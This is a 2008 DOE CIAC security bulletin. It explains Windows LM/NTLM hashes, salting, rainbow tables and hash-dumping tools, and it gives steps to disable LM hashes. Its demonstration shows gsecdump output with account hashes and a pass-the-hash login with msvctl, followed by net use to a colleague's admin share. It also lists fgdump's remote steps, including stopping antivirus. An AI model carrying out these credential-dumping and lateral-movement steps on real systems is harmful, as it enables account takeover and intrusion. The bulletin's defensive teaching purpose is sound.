-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 __________________________________________________________ The U.S. Department of Energy Computer Incident Advisory Capability ___ __ __ _ ___ / | /_\ / \___ __|__ / \ \___ __________________________________________________________ TECHNICAL BULLETIN Understanding Windows Hash Dumpers and Crackers May 21, 2008 23:00 GMT Number CIACTech08-002 ______________________________________________________________________________ PROBLEM: Windows Hash Dumper programs are both auditing and hacking tools. For auditing, they are used to detect poor passwords. As a hacking tool, they are also used for detecting poor passwords that can be broken and used for compromising systems or used directly to login to systems. PLATFORM: All Windows Platforms ABSTRACT: Windows hash dumping tools are often spotlighted as hacker tools that can somehow magically extract windows hashes and allow an intruder access to a system. In actuality, the hashes are there, in memory and on disk, where any admin or system level user can get at them. The tools just grab and print them out. This paper describes how Windows hashes are created, how the hash dumpers get at them, and what can be done with the hashes. ______________________________________________________________________________ LINKS: CIAC BULLETIN: http://www.ciac.org/ciac/techbull/CIACTech08-002.shtml OTHER LINKS: TrueSec: gsecdump: http://www.truesec.com/PublicStore/catalog/ Downloads,223.aspx pwdump: http://en.wikipedia.org/wiki/Pwdump Fgdump: http://foofus.net/fizzgig/fgdump/ TrueSec: msvctl: http://www.truesec.com/PublicStore/ catalog/Downloads,223.aspx Sysinternals: psexec: http://technet.microsoft.com/ en-us/sysinternals/bb795534.aspx Microsoft: Selecting Good Passwords: http://www.microsoft.com/technet/security/ smallbusiness/prodtech/WindowsXP/ select_sec_passwords.mspx John the Ripper: http://www.openwall.com/john/ Rainbow Tables: http://en.wikipedia.org/wiki/ Rainbow_table Disable LM Hash: http://support.microsoft.com/kb/299656 ______________________________________________________________________________ Windows hash dumping tools are often spotlighted as hacker tools that can somehow magically extract windows hashes and allow an intruder access to a system. In actuality, the hashes are there, in memory or on disk, where any admin or system level user can get at them. The tools just grab them and print them out. Windows Hashes ============== To understand windows hash dumping tools, you first have to understand Windows hashes. When you create a password for an account, the password is not stored in the system in clear text. It was very apparent early on that storing passwords on a system in clear text was not a good idea. Anyone who got access to the password file would have access to every account on the system. Trouble is, if you don’t have the password on a system you cannot use it to authenticate a user’s login. To get around this problem, system developers hashed the password with a one way hash and stored the hash on the system. When a person logs in, the password he types is hashed and the result compared to the stored hash. If they match, the user is allowed in. A one way hash is a function that converts an input text string to a unique output text string. However, it is one way because given the output sting, there is no function to give you back the input string. The only way to find the input string is to try all possible input strings until the output string matches the one you are searching for. For this reason, if an intruder were to steal the hash database, it could not be immediately used to break into a system because the passwords would have to be cracked first. Cracking involves trying every possible input string to find the one that generates the wanted output string. If the password is sufficiently long and complex, it can take an intruder a huge amount of time (millions of years for a sufficiently good password) to do the cracking. That is not to say that cracking programs have not found ways to shorten that process. The most common is to use a dictionary. Most human generated passwords use dictionary words and so hashing a dictionary as a first attempt to crack a password often gets results faster than trying a random list of characters. Newer cracking programs use what are called Rainbow Tables. In its simplest form, a Rainbow Table is a dictionary of hashes. You generate and store the table beforehand and then just lookup the hash in the table to find the password. It is actually a bit more complicated then that as you cannot store all possible hashes, but that is basically how it works. This method of attack became practical with the advent of large, inexpensive hard drives to hold the huge tables. One method for making Rainbow Tables difficult or impossible to use is to salt the hash. Salting involves adding some random characters (the salt) to the password before hashing it. Using a different salt with a password creates a different hash. You then save the salt with the hash so it can be used. There are now millions of variations for every password, one for every possible value of the salt, making it impossible to store sufficiently large Rainbow Tables to make the method work. While salt has been used in unix password hashes for many years, salt is not used in Windows hashes. Windows Hashes ============== Windows systems currently use one or more of four different authentication methods. LanManager (LM) NT Lan Manager (NTLM) NT Lan Manager 2 (NTLMv2) Kerberos Each of these methods uses different hashes of the password and different storage methods. LanManager (LM) hashes are the oldest and least secure of the Windows hashes. A password is first shifted to all upper case and then broken into two 7 character chunks. Each chunk is then hashed independently without salt and concatenated. The result is that an intruder need only crack two seven character hashes and need only consider upper case characters, numbers, and symbols to break the password. This is very easy to do using today’s technology. Another difficulty with LM as the security authenticator is that the hash is sent over the network in the clear when doing a network login to a system. This mechanism makes it possible to capture the hash by sniffing the network. The NT LanManager (NTLMv1) hash is created by taking the MD4 hash of the users password. This is a much stronger hash as the password is not changed to upper case, allows the use of the Unicode character set, and it is not broken into shorter, easier to crack chunks. To further increase security, logins with NTLMv1 are a challenge response mechanism so that the hash is never sent over the network. NT LanManager version 2 (NTLMv2) uses the NTLMv1 hash but with a much more secure challenge response mechanism to authenticate someone over the network. Kerberos is used by Microsoft Windows Active Directory based security. To be backward compatible with older Windows systems, most new systems come with all of these authentication mechanisms enabled. LM is enabled to allow connections with Windows for Workgroups, Windows 95, and Windows 98. If you are not sharing a network with these systems, you do not need it and it should be disabled. NTLMv1 is needed to share a network with Windows NT4 SP3 or earlier. Again, if yu are not sharing a network with this version of Windows, you do not need NTLM v1. NTLMv2 is need for connecting to Windows 2000 domains and Windows NT4 SP4 or later. Windows Local and Group Policy keys are available to control which of the LanMan versions a system will accept. Hash Dumpers ============ Probably the most well known of the hash dumpers is pwdump. There are currently seven versions of pwdump written by various people but all do essentially the same thing. They extract the LM and NTLM hashes from the SAM database. The SAM is that part of the registry that holds security information. They also try to dump the stored hashes from previous domain logins into the system and the hashes of the currently logged in users. To improve security, the SAM can be encrypted but most of the hash dumpers know how to decrypt it as the ability to decrypt it must be available for the system to use it. One thing to keep in mind is that you must be a privileged user to run the hash dumpers and extract any hashes. They do not magically get around the security system. That said, if you are logged into a workstation and have administrator access to that workstation and the domain administrator is also logged into that workstation, you can get the domain administrator’s hash using one of these hash dumpers. Pwdump ====== Pwdump is one of the oldest hash dumpers. It can dump the hashes in the local registry to a file that can be used with Windows cracking programs such as John the Ripper. Version 3 added the capability to dump hashes in remote systems. You must have admin access to the remote system to do this. It operates by pushing code onto the remote system using the ADMIN$ share. It then requests the Service Control Manager to install and run that code as a service. To extract the hashes, you must have privileged access to the Sam. As the Windows LSASS process runs with sufficient privileges, pwdump uses a process called DLL injection to inject its code into the LSASS code space and get it run. The code then extracts the password hashes and stores them in the registry. The attacking system can then connect to the registry remotely and download the hashes. Fgdump ====== Fgdump is the combination of several different hash dumping tools into one executable to make it easier to dump the hashes. It includes pwdump6, cachedump, and pstgdump. The following operational steps are from the fgdump readme. Bind to a remote machine using IPC$ (or a list of machines) Stop AV, if it is installed Locate file shares exposed on that machine Find a writable share from the above list, bind it to a local drive Upload fgexec (used for remote command execution) for cachedump Run pwdump Run cachedump Run pstgdump Unbind the remote file share Restart AV if it was running Unbind from IPC$ Pwdump6 dumps the hashes in the Sam registry file as described above. Cachedump dumps the cached domain credentials. When you do a domain login to Windows systems, the systems caches your credentials for situations where the domain controller is not available. This allows you to login to a system when the domain controller is down. Otherwise you could only login using local credentials. Pstgdump dumps the protected storage which includes things like saved IE and OutlookExpress passwords. Gsecdump ======== The newest kid on the block is gsecdump. Gsecdump is very similar in its capabilities to Fgdump but without the remote system capabilities. To run it on a remote system you must use Sysinternals (Now Microsoft) psexec program. Gsecdump dunps the Sam and the cach of domain credentials. In addition, it can dump the LSA, Wireless, and Active logon sessions. msvctl ====== Another new program related to the hash dumpers is msvctl. This program is essentially a login program that uses the hash instead of the password to login to a system. As all authentication is actually done with the hashes, this program dispenses with the password and directly uses the hashes to perform the logins. Disabling the LM Hash ===================== To disable the LM hash, you must make two changes using the registry or policy editors. The first disables the use of the LM hash in network logins. The second prevents the LM hash from being saved on disk in the SAM. These instructions are for Windows XP with the variations needed for Windows 2000 in parenthesis. Preventing the Use of the LM Hash in Network Logins - - --------------------------------------------------- In the control panel, open the Administrative Tools, Local Security Policy tool. Under Local Policies, select Security Options. In the Security Options List double click Network Security: Lan Manager authentication level (Lan Manager Authentication Level in Windows 2000). At this point, you will have a drop down list of local policy settings for what kinds of authentication to do for network logins. If possible, set this to, Send NTLMv2 response only/refuse LM & NTLM, which is the highest setting. If you must use a lower level setting, try to pick one that does not allow LM hashes. Preventing the Storing of LM Hashes - - ----------------------------------- The next step is to prevent the storing of LM hashes. Again, open the Local Security Policy tool and select Security Options. In the Security Options List, double click, Network security: Do not store LAN Manager hash value on next password change. In the dialog box that appears, select Enabled and click OK. You will then need to change all the passwords on the system. The new passwords will be stored in the SAM with the hash for a blank password for the LM hash and the real hash for the NTLM hash. This security option is not available in Windows 2000 so you will need to edit the registry directly. In Windows 2000, open regedit and edit the following registry key. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa add the key, NoLMHash to this key, and reboot your system. More information can be found in the following article. http://support.microsoft.com/kb/299656 Hash Dumpers in Use =================== To get a feel for how hash dumpers are used, this section wil go through all the steps necessary to dump the hashes and crack them. First run gsecdump -h to see the options. gsecdump [options] options: -h [ --help ] show help -a [ --dump_all ] dump all secrets -l [ --dump_lsa ] dump lsa secrets -w [ --dump_wireless ] dump mircosoft wireless connections -u [ --dump_usedhashes ] dump hashes from active logon sessions -s [ --dump_hashes ] dump hashes from SAM/AD Using -a, it will dump whatever it can find in a system. F:\Projects\gsecdump>gsecdump -a info: you must run as LocalSystem to dump LSA secrets Microsoft wireless secrets: No interfaces found CIAC\orvis::aa7060d41533f2daa361a6c342c88aea:6faccd47f6ba2685521aacb32fd788f2::: CIAC\jonathon::a46139feaaf2b9f1af13362357cec994:621e7e6212259c99338ea3733ef47abd ::: CIAC\BEATRICE$::00000000000000000000000000000000:e733a66ffb1bf591c011a1cbf84392a d::: CIAC\BEATRICE$::00000000000000000000000000000000:e733a66ffb1bf591c011a1cbf84392a d::: ASPNET(current):1003:aad3b435b51404eeaad3b435b51404ee:72f96de62387d4f07d0fc70067 a1b711::: administrator:1004:aad3b435b51404eeaad3b435b51404ee:a18d154b7ac68fab46c077f64d2c 6124::: Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0 89c0::: HelpAssistant(current):1000:8e8fa1208e3659556970e6173d54580:e9302c669523de51c557 a4c61c6b38d9::: SQLDebugger(current):1013:aad33235451404eeaad3b435b51404ee:c1f211f6d76d9755468b5 e7ef806fcc1::: SUPPORT_388945a0(current):1002:aad3b435b51404eeaad3b435b51404ee:5a69566824cd4d2b bec5441b00930be9::: VUSR_VAP2(current):1006:aad3b435b51404eeaad3b435b51404ee:5bd277e41258752719a45a0 82a83c952::: First, you see the hash of the logged in domain user ciac\orvis (me). Following that is the machine account logged into the domain ciac\beatrice and then the local accounts from the SAM. This system has LM hashes turned on so you see both the LM hash (between the second and third colon) and the NTLM hash (between the third and fourth hash). On some of the accounts the LM hash is disabled and is replaced with, aad3b435b51404eeaad3b435b51404ee which is the hash of a blank password. From this hash, you can see that the LM hash is actually two hashes concatenated together. For some accounts, you may also see all zeroes or NO PASSWORD********************* for the disabled LM hash. I see that Jonathon is logged into my system so I have his hash. I happen to know that his system is demonpc so I can use the msvctl program to login as him. First, run the msvctl command as jonathon and have it start a command shell. F:\>msvctl jonathon:1003:c222dae1d1379a51c22df6105198:7a306030abd444f34c2ab0181fde1033::: run cmd This opens a command shell on my system using Jonathon’s hash. If Jonathon has administrative privileges on a remote system, I can use the net commands to mount his drives or the psexec command to run gsecdump on the remote system to gather even more password hashes. First, try the net use command to see if I really have access to his system. F:>net use r: \\demonpc\c$ The command completed successfully. F:\>r: R:\>dir Volume in drive R has no label. Volume Serial Number is 04B4-5B64 Directory of R:\ 09/21/2007 09:19 AM